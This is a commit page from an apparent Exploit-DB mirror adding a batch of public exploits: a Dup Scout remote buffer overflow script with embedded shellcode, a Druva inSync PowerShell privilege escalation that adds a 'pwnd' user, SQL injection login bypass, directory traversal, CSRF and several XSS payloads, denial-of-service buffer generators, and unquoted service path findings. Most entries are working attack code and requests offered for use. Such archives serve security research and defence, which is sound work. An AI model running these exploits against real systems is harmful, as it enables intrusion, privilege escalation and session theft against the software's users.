bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2020-12-08

Browse source 
18 changes to exploits/shellcodes

TapinRadio 2.13.7 - Denial of Service (PoC)
RarmaRadio 2.72.5 - Denial of Service (PoC)

Realtek Audio Service 1.0.0.55 - 'RtkAudioService64.exe' Unquoted Service Path

Realtek Andrea RT Filters 1.0.64.7 - 'AERTSr64.EXE' Unquoted Service Path
Rumble Mail Server 0.51.3135 - 'rumble_win32.exe' Unquoted Service Path
Kite 1.2020.1119.0 - 'KiteService' Unquoted Service Path
Druva inSync Windows Client 6.6.3 - Local Privilege Escalation (PowerShell)

Dup Scout Enterprise 10.0.18 - 'online_registration' Remote Buffer Overflow

Joomla! 1.5 < 3.4.5 - Object Injection 'x-forwarded-for' Header Remote Code Execution
Joomla! 1.5 < 3.4.6 - Object Injection 'x-forwarded-for' Header Remote Code Execution

Eaton Intelligent Power Manager 1.6 - Directory Traversal

PandoraFMS NG747 7.0 - 'filename' Persistent Cross-Site Scripting

Joomla Plugin Simple Image Gallery Extended (SIGE) 3.5.3 - Multiple Vulnerabilities

Employee Record Management System 1.1 - Login Bypass SQL Injection

User Registration & Login and User Management System 2.1 - Cross Site Request Forgery
Cyber Cafe Management System  Project (CCMS) 1.0 - Persistent Cross-Site Scripting
Savsoft Quiz 5 - 'Skype ID' Stored XSS
vBulletin 5.6.3 - 'group' Cross Site Scripting
This commit is contained in:
Offensive Security 2020-12-08 05:01:56 +00:00
parent 045c2fe1ae
commit 9dd5a95a94
19 changed files with 825 additions and 4 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

28
exploits/hardware/webapps/48614.txt Normal file
View file

@ -0,0 +1,28 @@
# Exploit Title: Eaton Intelligent Power Manager 1.6 - Directory Traversal
# Date: 2018-09-29
# Exploit Author: Emre ÖVÜNÇ
# Vendor Homepage: https://powerquality.eaton.com/
# Software Link: https://powerquality.eaton.com/Support/Software-Drivers/default.asp?cx=-999
# Version: v1.6
# Tested on: Windows
# CVE-2018-12031
# https://nvd.nist.gov/vuln/detail/CVE-2018-12031
# https://github.com/EmreOvunc/Eaton-Intelligent-Power-Manager-Local-File-Inclusion
# PoC
To exploit vulnerability, someone could use
'https://[HOST]/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../'
request to get some informations from the target.
GET /server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../windows/System32/drivers/etc/host
HTTP/1.1
Host: [TARGET]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:60.0)
Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

20
exploits/multiple/webapps/49165.txt Normal file
View file

@ -0,0 +1,20 @@
# Exploit Title: Employee Record Management System 1.1 - Login Bypass SQL Injection
# Date: 20201117
# Exploit Author: Anurag Kumar Rawat(A1C3VENOM)
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/employee-record-management-system-in-php-and-mysql/
# Version: 1.1
# Tested on Parrot os(Linux)
Attack Vector:
An attacker can gain admin panel access using malicious sql injection quiries.
Steps to reproduce:
1. Open admin login page using following URl:
-> http://localhost/erms/admin/index.php
2. Now put below Payload in both the fields( User ID & Password)
Payload: ' or '1'='1
3)Server accept this payload and attacker successfully bypassed admin panel
without any credentials

6
exploits/php/webapps/39033.py
View file

@ -1,17 +1,17 @@
#!/usr/bin/env python
# Exploit Title: Joomla 1.5 - 3.4.5 Object Injection RCE X-Forwarded-For header
# Exploit Title: Joomla 1.5 - 3.4.6 Object Injection RCE X-Forwarded-For header
# Date: 12/17/2015
# Exploit Author: original - Gary@ Sec-1 ltd, Modified - Andrew McNicol BreakPoint Labs (@0xcc_labs)
# Vendor Homepage: https://www.joomla.org/
# Software Link: http://joomlacode.org/gf/project/joomla/frs/
# Version: Joomla 1.5 - 3.4.5
# Version: Joomla 1.5 - 3.4.6
# Tested on: Ubuntu 14.04.2 LTS (Joomla! 3.2.1 Stable)
# CVE : CVE-2015-8562
'''
Joomla 1.5 - 3.4.5 Object Injection RCE - CVE-2015-8562
Joomla 1.5 - 3.4.6 Object Injection RCE - CVE-2015-8562
PoC for CVE-2015-8562 to spawn a reverse shell or automate RCE
Original PoC from Gary@ Sec-1 ltd (http://www.sec-1.com):

54
exploits/php/webapps/48700.txt Normal file
View file

@ -0,0 +1,54 @@
# Exploit Title: PandoraFMS NG747 7.0 - 'filename' Persistent Cross-Site Scripting
# Date: 2020-08-20
# Exploit Author: Emre ÖVÜNÇ
# Vendor Homepage: https://pandorafms.org/
# Software Link: https://pandorafms.org/features/free-download-monitoring-software/
# Version: 7.0NG747
# Tested on: Windows/Linux/ISO
# Link https://github.com/EmreOvunc/Pandora-FMS-7.0-NG-747-Stored-XSS
# Description
A stored cross-site scripting (XSS) in Pandora FMS 7.0 NG 747 can result in
an attacker performing malicious actions to users who open a maliciously
crafted link or third-party web page. (Workspace >> Issues >> List of
issues >> Add - Attachment)
# PoC
To exploit vulnerability, someone could use a POST request to
'/pandora_console/index.php' by manipulating 'filename' parameter in the
request body to impact users who open a maliciously crafted link or
third-party web page.
POST /pandora_console/index.php?sec=workspace&sec2=operation/incidents/incident_detail&id=3&upload_file=1
HTTP/1.1
Host: [HOST]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:78.0)
Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;
boundary=---------------------------188134206132629608391758747427
Content-Length: 524
DNT: 1
Connection: close
Cookie: PHPSESSID=3098fl65su4l237navvq6d5igs
Upgrade-Insecure-Requests: 1
-----------------------------188134206132629608391758747427
Content-Disposition: form-data; name="userfile"; filename="\"><svg
onload=alert(document.cookie)>.png"
Content-Type: image/png
"><svg onload=alert(1)>
-----------------------------188134206132629608391758747427
Content-Disposition: form-data; name="file_description"
desc
-----------------------------188134206132629608391758747427
Content-Disposition: form-data; name="upload"
Upload
-----------------------------188134206132629608391758747427--

316
exploits/php/webapps/49064.txt Normal file
View file

@ -0,0 +1,316 @@
# Exploit Title: Joomla Plugin Simple Image Gallery Extended (SIGE) 3.5.3 - Multiple Vulnerabilities
# Exploit Author: Vulnerability-Lab
# Date: 2020-11-11
# Vendor Homepage: https://kubik-rubik.de/sige-simple-image-gallery-extended
# Software Link: https://kubik-rubik.de/sige-simple-image-gallery-extended
# Version: 3.5.3
Document Title:
===============
SIGE (Joomla) 3.4.1 & 3.5.3 Pro - Multiple Vulnerabilities
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2265
Release Date:
=============
2020-11-11
Vulnerability Laboratory ID (VL-ID):
====================================
2265
Common Vulnerability Scoring System:
====================================
7.8
Vulnerability Class:
====================
Multiple
Current Estimated Price:
========================
2.000€ - 3.000€
Product & Service Introduction:
===============================
It offers numerous opportunities to present pictures quickly and easily
in articles. The unique feature of the plugin is
that you can control any parameter on the syntax call. Editor Button -
SIGE Parameters: With the button, you can set the
parameters very easy on-the-fly in an article. It is an excellent
addition to SIGE. Highlights are: parameter call, watermark
function, read IPTC data, thumbnail storage, crop function, sort by
modification date, output as a list, CSS Image Tooltip,
Editor Button SIGE Parameter and much more. In version 1.7-2, SIGE was
rewritten entirely and equipped with numerous innovations.
The absolute highlight is the turbo mode. This feature doesn't exist in
any other plugin for Joomla!. In Turbo Mode 2 text files
are created from the HTML output of the gallery and loaded in successive
runs. This feature eliminates the tedious editing
process of each image. In a test with 50 large images, the creation of a
gallery with all the extra features (save thumbnails,
watermark generation, resize original images, etc.) without turbo mode
lasted approximately 17 seconds. In turbo mode, it only
took 1 second, and the gallery on the same scale was available! For
calling the syntaxes, additionally, an Editor Button has
been programmed. It makes it very easy to choose the required syntax,
showing all the settings and parameters of the plugin.
It is a great enrichment in using the SIGE plugin.
(Copy of the Homepage:
https://kubik-rubik.de/sige-simple-image-gallery-extended )
(Software: https://kubik-rubik.de/sige-simple-image-gallery-extended ;
https://kubik-rubik.de/downloads/sige-simple-image-gallery-extended ;
https://extensions.joomla.org/extension/photos-a-images/galleries/sige/ )
Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered multiple
web vulnerabilities in the Simple Image Gallery Extended (SIGE) v3.4.1 &
v3.5.3 pro extension for joomla.
Affected Product(s):
====================
Vendor:
Product: Simple Image Gallery Extended (SIGE) v3.4.1 & v3.5.3 Pro -
Joomla Extension (Web-Application)
Vulnerability Disclosure Timeline:
==================================
2020-11-10: Researcher Notification & Coordination (Security Researcher)
2020-11-11: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Authentication Type:
====================
Open Authentication (Anonymous Privileges)
User Interaction:
=================
No User Interaction
Disclosure Type:
================
Full Disclosure
Technical Details & Description:
================================
1.1
A file include vulnerability has been discovered in the official Simple
Image Gallery Extended (SIGE) v3.4.1 & v3.5.3 pro extension for joomla.
The web vulnerability allows remote attackers to unauthorized upload
web-shells or malicious contents to compromise the local file-system.
The vulnerability is located in the img parameter of the print.php file.
Remote attackers are able to upload images to the unrestricted assets
path to compromise the web-applications file-system and involved
database management system. Exploitation requires no user interaction
and only
a low privileged user account to upload images.
1.2
Multiple non-persistent cross site web vulnerabilities has been
discovered in the official Simple Image Gallery Extended (SIGE) v3.4.1 &
v3.5.3 pro extension for joomla.
The vulnerability allows remote attackers to inject own malicious script
codes with non-persistent attack vector to compromise browser to
web-application requests from the client-side.
The non-persistent cross site scripting web vulnerabilities are located
in the `name` and `title` parameters of the `print.php` file.
Remote attackers without user or guest privileges are able to make own
malicious special crafted links to compromise client-side
GET method requests. The attack vector is non-persistent and the issue
affects the client-side.
Successful exploitation of the vulnerabilities results in session
hijacking, non-persistent phishing attacks, non-persistent
external redirects to malicious source and non-persistent client-side
manipulation of affected application modules.
Proof of Concept (PoC):
=======================
1.1
The remote file include web vulnerability can be exploited by remote
attackers without privileged user account or user interaction.
For security demonstration or to reproduce the persistent cross site web
vulnerability follow the provided information and steps below to continue.
Dork(s):
intext:"Powered by Simple Image Gallery Extended"
intext:"Powered by Simple Image Gallery Extended - Kubik-Rubik.de"
PoC: Exploitation
http://[SERVER/DOMAIN]/[folders]/print.php?img=[RFI
VULNERABILITY!]&name=[NAME]%20title=[TITLE]
1.2
The non-persistent cross site scripting web vulnerability can be
exploited by remote attackers without privileged user account and with
low user interaction.
For security demonstration or to reproduce the persistent cross site web
vulnerability follow the provided information and steps below to continue.
Dork(s):
intext:"Powered by Simple Image Gallery Extended"
intext:"Powered by Simple Image Gallery Extended - Kubik-Rubik.de"
PoC: Payload
"><svg onload=alert()>
'><script>alert('');</script>
<IMG "'"><script>alert()</script>'>
PoC: Example
http://[SERVER/DOMAIN]/[folders]/print.php?img=[IMG]&name=[NON-PERSISTENT XSS]%20title=[TITLE]
http://[SERVER/DOMAIN]/[folders]/print.php?img=[IMG]&name=[NAME]%20title=[NON-PERSISTENT
XSS]
PoC: Exploitation
http://[SERVER/DOMAIN]/oldsite/plugins/content/sige/plugin_sige/print.php
?img=http://[SERVER/DOMAIN]/assets/public/js/uploading/images/h4shur/h4.gif&name=%22%3E%3Ch1%3Ehacked%20by%20h4shur%3C/h1%3E%22%20title=%22%3E%3Cscript%3Ealert(%27hacked%20by%20h4shur%27)%3C/script%3E
Solution - Fix & Patch:
=======================
1.1
The remote file include vulnerability issue can be resolved by the
following steps ...
Example :
?php
$files=array('test.gif');
if(in_array($_GET['file'], $files)){
include ($_GET['file']);
}
?
* If you are a server administrator, turn off allow_url_fopen from the file
* Or do it with the ini_set command. Only for (RFI)
?php
ini_set('allow_url_fopen ', 'Off');
?
* We can use the strpos command to check that if the address is: //
http, the file will not be enclosed
?php
$strpos = strpos($_GET['url'],'http://');
if(!$strpos){
include($_GET['url']);
}
?
* Using str_replace we can give the given address from two characters
"/", "." Let's clean up
?php
$url=$_GET['url'];
$url = str_replace("/", "", $url);
$url = str_replace(".", "", $url);
include($url);
?
1.2
The client-side cross site scripting vulnerabilities can be resolved by
the following steps ...
1. Encode and escape as parse the name and title parameters
2. Filter the input for special chars and disallow them in parameters
Security Risk:
==============
1.1
The securit risk of the remote file include vulnerability in the img
path of the web-application request is estimated as high.
1.2
The security risk of the non-persistent cross site scripting
vulnerabilities is estimated as medium.
Credits & Authors:
==================
h4shursec - https://www.vulnerability-lab.com/show.php?user=h4shursec
Twitter: @h4shur ; Telegram: @h4shur ; Instagram: @netedit0r
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com www.vuln-lab.com
www.vulnerability-db.com
Services: magazine.vulnerability-lab.com
paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php
vulnerability-lab.com/rss/rss_upcoming.php
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php
vulnerability-lab.com/register.php
vulnerability-lab.com/list-of-bug-bounty-programs.php
Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the
specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.
Copyright © 2020 | Vulnerability Laboratory - [Evolution
Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com

32
exploits/php/webapps/49180.txt Normal file
View file

@ -0,0 +1,32 @@
# Exploit Title: User Registration & Login and User Management System 2.1 - Cross Site Request Forgery
# Exploit Author: Dipak Panchal(th3.d1p4k)
# Vendor Homepage: https://phpgurukul.com
# Software Link: http://user-registration-login-and-user-management-system-with-admin-panel
# Version: 5
# Tested on Windows 10
Attack Vector:
An attacker can craft HTML page containing POST information to have the
victim sign into an attacker's account, where the victim can add
information assuming he/she is logged into the correct account, where in
reality, the victim is signed into the attacker's account where the changes
are visible to the attacker.
Exploit:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/loginsystem/" method="POST">
<input type="hidden" name="uemail" value="user1@mail.com" />
<input type="hidden" name="password" value="User@1234" />
<input type="hidden" name="login" value="LOG&#32;IN" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Mitigation:
Please add a csrf token to login request or make some type prompt that the
session has ended when the new login from attacker occurs.

17
exploits/php/webapps/49204.txt Normal file
View file

@ -0,0 +1,17 @@
# Exploit Title: Cyber Cafe Management System Project (CCMS) 1.0 - Persistent Cross-Site Scripting
# Date: 04-12-2020
# Exploit Author: Pruthvi Nekkanti
# Vendor Homepage: https://phpgurukul.com
# Product link: https://phpgurukul.com/cyber-cafe-management-system-using-php-mysql/
# Version: 1.0
# Tested on: Kali Linux
Attack vector:
This vulnerability can results attacker to inject the XSS payload in admin username and each time any user will visits the website, the XSS triggers and attacker can able to steal the cookie according to the crafted payload.
Vulnerable Parameters: Admin Username.
Steps-To-Reproduce:
1. Go to the Product admin panel change the admin username
2. Put this payload in admin username field:"><script>alert(document.cookie)</script>
3. Now go to the website and the XSS will be triggered.

23
exploits/php/webapps/49208.txt Normal file
View file

@ -0,0 +1,23 @@
# Exploit Title: Savsoft Quiz 5 - 'Skype ID' Stored XSS
# Exploit Author: Dipak Panchal(th3.d1p4k)
# Vendor Homepage: https://savsoftquiz.com
# Software Link: https://github.com/savsofts/savsoftquiz_v5
# Version: 5
# Tested on Windows 10
Attack Vector:
This vulnerability can results attacker to inject the XSS payload in User
Registration section and each time admin visits the manage user section
from admin panel, and home page too. XSS triggers and attacker can able to
steal the cookie according to the crafted payload.
Steps to reproduce:
1. Create new account and verified it.
2. Navigate to Edit Profile:
-> http://localhost/savsoftquiz/index.php/user/edit_user/123
3. Put the below Payload in Skype ID field. and submit it.
Payload: abcd<script>alert("XSS")</script>
4. You will get XSS popup.

28
exploits/php/webapps/49209.txt Normal file
View file

@ -0,0 +1,28 @@
# Exploit Title: vBulletin 5.6.3 - 'group' Cross Site Scripting
# Date: 05.09.2020
# Author: Vincent666 ibn Winnie
# Software Link: https://www.vbulletin.com/en/features/
# Tested on: Windows 10
# Web Browser: Mozilla Firefox & Opera
# Google Dorks: "Powered by vBulletin® Version 5.6.3"
Go to the "Admin CP" - click on "Styles" - click "Style Manager" -
Choose "Denim" or other theme and choose action "Add new template" and
click "Go".
Put on the title "1" and template "1" and "Save and Reload". Now you
can catch the new URL with HTTP Live Headers or with hands.
So..we have Url :
https://localhost/admincp/template.php?templateid=608&group=&expandset=&searchset=&searchstring=&do=edit&windowScrollTop=168&textareaScrollTop=0
Test it with hands and get cross site scripting. Use for tests
different browsers. I use Mozilla Firefox and Opera.
https://localhost/admincp/template.php?templateid=1&group=""><script>alert("Cross
Site Scripting")</script><script>alert(document.cookie)</script>&expandset=&searchset=&searchstring=&do=edit&windowScrollTop=
Picture:
https://imgur.com/a/b6gH5Fn

30
exploits/windows/dos/49206.txt Normal file
View file

@ -0,0 +1,30 @@
# Exploit Title: TapinRadio 2.13.7 - Denial of Service (PoC)
# Date: 2020-05-12
# Exploit Author: Ismael Nava
# Vendor Homepage: http://www.raimersoft.com/
# Software Link: www.raimersoft.com/downloads/tapinradio_setup_x64.exe
# Version: 2.13.7 x64
# Tested on: Windows 10 Home x64
#STEPS
# Open the program TapinRadio
# In Settings select Preferences option
# Click in Miscellaneous and click in Set Application Proxy
# Run the python exploit script, it will create a new .txt files
# Copy the content of the file "Mikon.txt"
# Paste the content in the field Username and Address and click in OK
# Click in Ok again
# After TapinRadio closed, the program did not work again if the user try to open again, so it is necessary uninstall and install again
# End :)
buffer = 'K' * 20000
try:
file = open("Mikon.txt","w")
file.write(buffer)
file.close()
print("Archive ready")
except:
print("Archive no ready")

29
exploits/windows/dos/49207.txt Normal file
View file

@ -0,0 +1,29 @@
# Exploit Title: RarmaRadio 2.72.5 - Denial of Service (PoC)
# Date: 2020-05-12
# Exploit Author: Ismael Nava
# Vendor Homepage: http://www.raimersoft.com/
# Software Link: https://www.raimersoft.com/rarmaradio.html
# Version: 2.75.5
# Tested on: Windows 10 Home x64
# CVE : n/a
#STEPS
# Open the program TapinRadio
# In Edit select Settings option
# Click in Network
# Run the python exploit script, it will create a new .txt files
# Copy the content of the file "Paimon.txt"
# Paste the content in the field Username, Address and Server and click in OK
# End :)
buffer = 'K' * 20000
try:
file = open("Paimon.txt","w")
file.write(buffer)
file.close()
print("Archive ready")
except:
print("Archive no ready")

32
exploits/windows/local/49015.txt Normal file
View file

@ -0,0 +1,32 @@
# Exploit Title: Realtek Audio Service 1.0.0.55 - 'RtkAudioService64.exe' Unquoted Service Path
# Discovery by: Erika Figueroa
# Discovery Date: 2020-11-07
# Vendor Homepage: https://www.realtek.com/en/
# Tested Version: 1.0.0.55
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 8.1 x64 es
# Step to discover Unquoted Service Path:
C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "CodeMeter" | findstr /i /v """
Realtek Audio Service RtkAudioService C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe Auto
# Service info:
C:\>sc qc "RtkAudioService"
[[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: RtkAudioService
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
GRUPO_ORDEN_CARGA : PlugPlay
ETIQUETA : 0
NOMBRE_MOSTRAR : Realtek Audio Service
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem
#Exploit:
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

41
exploits/windows/local/49158.txt Normal file
View file

@ -0,0 +1,41 @@
# Exploit Title: Realtek Andrea RT Filters 1.0.64.7 - 'AERTSr64.EXE' Unquoted Service Path
# Discovery by: manuel Alvarez
# Discovery Date: 2020-11-07
# Vendor Homepage: https://www.realtek.com/en/
# Tested Version: 1.0.64.7
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 x64 es
# Step to discover Unquoted Service Path:
C:\>wmic service get name, pathname, displayname, startmode | findstr /i
"Auto" | findstr /i /v "C:\Windows\\" | findstr /i "CodeMeter" | findstr /i
/v """
Andrea RT Filters Service
AERTFilters C:\Program Files\IDT\WDM\AESTSr64.exe
Auto
# Service info:
C:\Users\ComoDVD>sc qc AESTFilters
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: AESTFilters
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files\IDT\WDM\AESTSr64.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : Andrea ST Filters Service
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem
#Exploit:
A successful attempt would require the local user to be able to insert
their code in the system root path undetected by the OS or other security
applications where it could potentially be executed during application
startup or reboot. If successful, the local user's code would execute with
the elevated privileges of the application.

30
exploits/windows/local/49203.txt Normal file
View file

@ -0,0 +1,30 @@
# Exploit Title: Rumble Mail Server 0.51.3135 - 'rumble_win32.exe' Unquoted Service Path
# Date: 2020-9-3
# Exploit Author: Mohammed Alshehri
# Vendor Homepage: http://rumble.sf.net/
# Software Link: https://sourceforge.net/projects/rumble/files/Windows%20binaries/rumble_0.51.3135-setup.exe
# Version: Version 0.51.3135
# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763
# Service info:
C:\Users\m507>sc qc "RumbleService"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: RumbleService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Rumble\rumble_win32.exe --service
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Rumble Mail Server
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\m507>
# Exploit:
This vulnerability could permit executing code during startup or reboot with the escalated privileges.

28
exploits/windows/local/49205.txt Normal file
View file

@ -0,0 +1,28 @@
# Exploit Title: Kite 1.2020.1119.0 - 'KiteService' Unquoted Service Path
# Discovery by: Ismael Nava
# Discovery Date: 05-12-2020
# Vendor Homepage: https://www.kite.com/
# Software Links : https://www.kite.com/download/
# Tested Version: 1.2020.1119.0
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 64 bits
# Step to discover Unquoted Service Path:
C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """
KiteService KiteService C:\Program Files\Kite\KiteService.exe Auto
C:\>sc qc "KiteService"
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: KiteService
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 0 IGNORE
NOMBRE_RUTA_BINARIO: C:\Program Files\Kite\KiteService.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : KiteService
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem

32
exploits/windows/local/49211.ps1 Normal file
View file

@ -0,0 +1,32 @@
# Exploit Title: Druva inSync Windows Client 6.6.3 - Local Privilege Escalation (PowerShell)
# Date: 2020-12-03
# Exploit Author: 1F98D
# Original Author: Matteo Malvica
# Vendor Homepage: druva.com
# Software Link: https://downloads.druva.com/downloads/inSync/Windows/6.6.3/inSync6.6.3r102156.msi
# Version: 6.6.3
# Tested on: Windows 10 (x64)
# CVE: CVE-2020-5752
# References: https://www.matteomalvica.com/blog/2020/05/21/lpe-path-traversal/
# Druva inSync exposes an RPC service which is vulnerable to a command injection attack.
$ErrorActionPreference = "Stop"
$cmd = "net user pwnd /add"
$s = New-Object System.Net.Sockets.Socket(
[System.Net.Sockets.AddressFamily]::InterNetwork,
[System.Net.Sockets.SocketType]::Stream,
[System.Net.Sockets.ProtocolType]::Tcp
)
$s.Connect("127.0.0.1", 6064)
$header = [System.Text.Encoding]::UTF8.GetBytes("inSync PHC RPCW[v0002]")
$rpcType = [System.Text.Encoding]::UTF8.GetBytes("$([char]0x0005)`0`0`0")
$command = [System.Text.Encoding]::Unicode.GetBytes("C:\ProgramData\Druva\inSync4\..\..\..\Windows\System32\cmd.exe /c $cmd");
$length = [System.BitConverter]::GetBytes($command.Length);
$s.Send($header)
$s.Send($rpcType)
$s.Send($length)
$s.Send($command)

2
exploits/windows/remote/46697.py
View file

@ -71,6 +71,8 @@ def SendString(string,ip):
for char in string:
target = socket(AF_INET, SOCK_DGRAM)
target.sendto(characters[char],(ip,1978))
sleep(0.5)

63
exploits/windows/remote/49210.py Executable file
View file

@ -0,0 +1,63 @@
# Dup Scout Enterprise 10.0.18 - 'online_registration' Remote Buffer Overflow
# Requires web service to be enabled.
# Tested on Windows 10 Pro (x64)
# Based on: https://www.exploit-db.com/exploits/43145 and https://www.exploit-db.com/exploits/40457
# Credits: Tulpa and SICKNESS for original exploits
# Modified: @0rbz_
import socket,os,time,struct,argparse,sys
parser = argparse.ArgumentParser()
parser.add_argument('--host', required=True)
args = parser.parse_args()
host = args.host
port = 80
# msfvenom --platform windows -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d\x25\x26\x2b\x3d" -f py
buf = ""
buf += "\xb8\xa0\xa1\xfd\x38\xd9\xf7\xd9\x74\x24\xf4\x5a\x31"
buf += "\xc9\xb1\x31\x31\x42\x13\x83\xc2\x04\x03\x42\xaf\x43"
buf += "\x08\xc4\x47\x01\xf3\x35\x97\x66\x7d\xd0\xa6\xa6\x19"
buf += "\x90\x98\x16\x69\xf4\x14\xdc\x3f\xed\xaf\x90\x97\x02"
buf += "\x18\x1e\xce\x2d\x99\x33\x32\x2f\x19\x4e\x67\x8f\x20"
buf += "\x81\x7a\xce\x65\xfc\x77\x82\x3e\x8a\x2a\x33\x4b\xc6"
buf += "\xf6\xb8\x07\xc6\x7e\x5c\xdf\xe9\xaf\xf3\x54\xb0\x6f"
buf += "\xf5\xb9\xc8\x39\xed\xde\xf5\xf0\x86\x14\x81\x02\x4f"
buf += "\x65\x6a\xa8\xae\x4a\x99\xb0\xf7\x6c\x42\xc7\x01\x8f"
buf += "\xff\xd0\xd5\xf2\xdb\x55\xce\x54\xaf\xce\x2a\x65\x7c"
buf += "\x88\xb9\x69\xc9\xde\xe6\x6d\xcc\x33\x9d\x89\x45\xb2"
buf += "\x72\x18\x1d\x91\x56\x41\xc5\xb8\xcf\x2f\xa8\xc5\x10"
buf += "\x90\x15\x60\x5a\x3c\x41\x19\x01\x2a\x94\xaf\x3f\x18"
buf += "\x96\xaf\x3f\x0c\xff\x9e\xb4\xc3\x78\x1f\x1f\xa0\x77"
buf += "\x55\x02\x80\x1f\x30\xd6\x91\x7d\xc3\x0c\xd5\x7b\x40"
buf += "\xa5\xa5\x7f\x58\xcc\xa0\xc4\xde\x3c\xd8\x55\x8b\x42"
buf += "\x4f\x55\x9e\x20\x0e\xc5\x42\x89\xb5\x6d\xe0\xd5"
buffer = "\x41" * 260
buffer += struct.pack("<L", 0x10090c83) # JMP ESP - libspp
buffer += "\x90" * 20
buffer += buf
buffer += "\x90" * (10000 - len(buffer))
evil = "POST /online_registration HTTP/1.1\r\n"
evil += "Host: " + sys.argv[2] +"\r\n"
evil += "User-Agent: Mozilla/5.0\r\n"
evil += "Connection: close\r\n"
evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
evil += "Accept-Language: en-us,en;q=0.5\r\n"
evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
evil += "Keep-Alive: 300\r\n"
evil += "Proxy-Connection: keep-alive\r\n"
evil += "Content-Type: application/x-www-form-urlencoded\r\n"
evil += "Content-Length: 17000\r\n\r\n"
evil += "customer_name=" + buffer
evil += "&unlock_key=" + buffer + "\r\n"
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect((host,port))
print 'Sending evil buffer...'
s.send(evil)
print 'Payload Sent!'
s.close()

18
files_exploits.csv
View file

@ -6763,6 +6763,8 @@ id,file,description,date,author,type,platform,port
49083,exploits/windows/dos/49083.pl,"Internet Download Manager 6.38.12 - Scheduler Downloads Scheduler Buffer Overflow (PoC)",2020-11-19,"Vincent Wolterman",dos,windows,
